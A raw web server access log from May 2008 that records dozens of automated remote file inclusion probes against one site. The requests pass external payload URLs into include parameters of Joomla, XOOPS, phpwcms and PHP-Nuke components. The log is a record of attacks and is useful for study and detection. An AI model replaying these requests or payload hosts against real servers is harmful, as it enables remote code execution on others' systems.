128.46.156.155 - - [25/May/2008:10:02:01 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:02:01 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [25/May/2008:10:02:14 -0700] "GET /logs/access_080322.log/book.php5?page=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:10:02:45 -0700] "GET /index.php?open=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:01 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:01 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:07 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:22 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:23 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:28 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:28 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:03:28 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [25/May/2008:10:03:37 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [25/May/2008:10:03:37 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:10:03:48 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:10:03:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:10:03:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.192.125.88 - - [25/May/2008:10:03:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.informacione.info/userimgs/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:10:04:04 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:10:04:10 -0700] "GET /logs//index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:10:04:11 -0700] "GET //index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:10:04:38 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.119.49 - - [25/May/2008:10:04:42 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.119.49 - - [25/May/2008:10:04:43 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:10:04:57 -0700] "GET /logs/access_080326.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:10:05:02 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,36//component/option,com_sitemap/Itemid,50/component